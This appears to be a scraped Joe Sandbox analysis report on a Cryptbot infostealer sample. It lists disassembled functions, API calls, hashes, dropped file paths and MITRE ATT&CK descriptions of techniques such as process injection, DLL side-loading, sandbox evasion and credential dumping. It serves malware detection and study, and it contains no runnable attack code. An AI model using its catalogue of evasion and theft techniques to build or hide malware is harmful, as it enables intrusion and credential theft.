API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: 509fb45aa152a313aaaeafb7378a400715b6a058b7ff2fb7446cc20dfbd81b45
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 3A112EB1A242018BCB55DF28C2847997BF1BF45700F2585DAED899F34ADB34ED10CB86

Function 002D18B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 002D191E

Strings

Unknown error, xrefs: 002D18B2
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D18FF

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 211f17566fe862bf26f71ca18cda7336d784eda7d07e01b6cec06fdd45dbf8ba
Instruction ID: 062906e6354a36a4e615c4f00efbcd1482b113da49110a64e9cdbb501016765a
Opcode Fuzzy Hash: 211f17566fe862bf26f71ca18cda7336d784eda7d07e01b6cec06fdd45dbf8ba
Instruction Fuzzy Hash: 05018070418B45DBD700AF15E48881ABFF1FF89350F868899E5C946269DB32D8B8CB46

Function 6C307561 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C307583

Part of subcall function 6C353E00: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C307596), ref: 6C353E63

strlen.MSVCRT ref: 6C3075F4
strlen.MSVCRT ref: 6C307662
strlen.MSVCRT ref: 6C3076D6

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 2b0d00e121d1cdd6b540000d89dcfca50022a53029231340a23331acf12729a8
Instruction ID: 7651edd4a926ec5fefa7b0920043b74fad8696cef7838b67ea8c671d5883452f
Opcode Fuzzy Hash: 2b0d00e121d1cdd6b540000d89dcfca50022a53029231340a23331acf12729a8
Instruction Fuzzy Hash: 03511675B05A008FCB04EF29C088A59FBF6BF86304F4185ADD8919F764CB31A819CF82

Function 6C2F8080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C2F81A1), ref: 6C2F80A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C2F81A1), ref: 6C2F80E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C2F81A1), ref: 6C2F80F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C2F81A1), ref: 6C2F8118

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 8175e9c263e4a62557dc29c7bf85c53c412a54a729aae65cd843af7f8d896662
Instruction ID: 200c18490caab865be0947bc2da5de7ce60e0166115dcb9b2857882b6f6d8bea
Opcode Fuzzy Hash: 8175e9c263e4a62557dc29c7bf85c53c412a54a729aae65cd843af7f8d896662
Instruction Fuzzy Hash: DD115EB178A10D8ADF00FB2D968665AFBB0AB07318F91092ED962C7600E731D486C693

Function 002D6B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,002D6C81,?,?,?,?,?,?,00000000,002D4F24), ref: 002D6B87
InitializeCriticalSection.KERNEL32(?,?,?,?,002D6C81,?,?,?,?,?,?,00000000,002D4F24), ref: 002D6BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,002D6C81,?,?,?,?,?,?,00000000,002D4F24), ref: 002D6BD0
EnterCriticalSection.KERNEL32(?,?,?,?,002D6C81,?,?,?,?,?,?,00000000,002D4F24), ref: 002D6BF8

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 893643bcc5c85c0dd337f981ad7a13278642c06e116ce3011bae996de0c40bc5
Instruction ID: b5ab3d083a7e8420acc6025086ebdd875cc59a8dc69e44eff72f567dfffa6e50
Opcode Fuzzy Hash: 893643bcc5c85c0dd337f981ad7a13278642c06e116ce3011bae996de0c40bc5
Instruction Fuzzy Hash: 1A116DB19295018ADB10BF7CB9CD22A7BE0EB04304F65482BC486DB315E771ECA4CB96

Function 6C2EAB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C2EAB5E
TlsGetValue.KERNEL32 ref: 6C2EAB85
GetLastError.KERNEL32 ref: 6C2EAB8C
LeaveCriticalSection.KERNEL32 ref: 6C2EABAC

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: c3763c4d2e922fa32926f3d51cca84af525d461e5863894539db598c97a1bf80
Instruction ID: 0d74fde196496c5c07ad2e8360b0df0236db40faa991bbfd529fbd6fb651b3e1
Opcode Fuzzy Hash: c3763c4d2e922fa32926f3d51cca84af525d461e5863894539db598c97a1bf80
Instruction Fuzzy Hash: FDF081B2B443068FDB00FF7995C590A7B74EA55254B05066CED4497205D731A5488BA3

Function 002D2000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,002D21D3,?,?,?,?,?,002D17E8), ref: 002D200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,002D21D3,?,?,?,?,?,002D17E8), ref: 002D2035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,002D21D3,?,?,?,?,?,002D17E8), ref: 002D203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,002D21D3,?,?,?,?,?,002D17E8), ref: 002D205C

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: f9c3550ffc83077f923db63563faf83f17fac13df7fc8b78a506cc97779a9dca
Instruction ID: 294867655fd3a80f7b4efbc4ae1ce454a7ec8f380fc1e606d9461ad7a38fc362
Opcode Fuzzy Hash: f9c3550ffc83077f923db63563faf83f17fac13df7fc8b78a506cc97779a9dca
Instruction Fuzzy Hash: 27F0A4B5A11702CFDB107F78E88851A7BA8EA64341F06442ADE984B314D730EC1ACBA2

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\service123.exe

C:\Users\user\AppData\Local\Temp\uAGceqKEYCLcAMToKQDI.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Windows Analysis Report
file.exe

Function 6C2E14B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Function 002D116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 002D15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 002D81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Function 002D8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Function 002D13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 002D11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 002D1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6C3B4230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 002D1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 002D13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C2FB1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C2FB310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON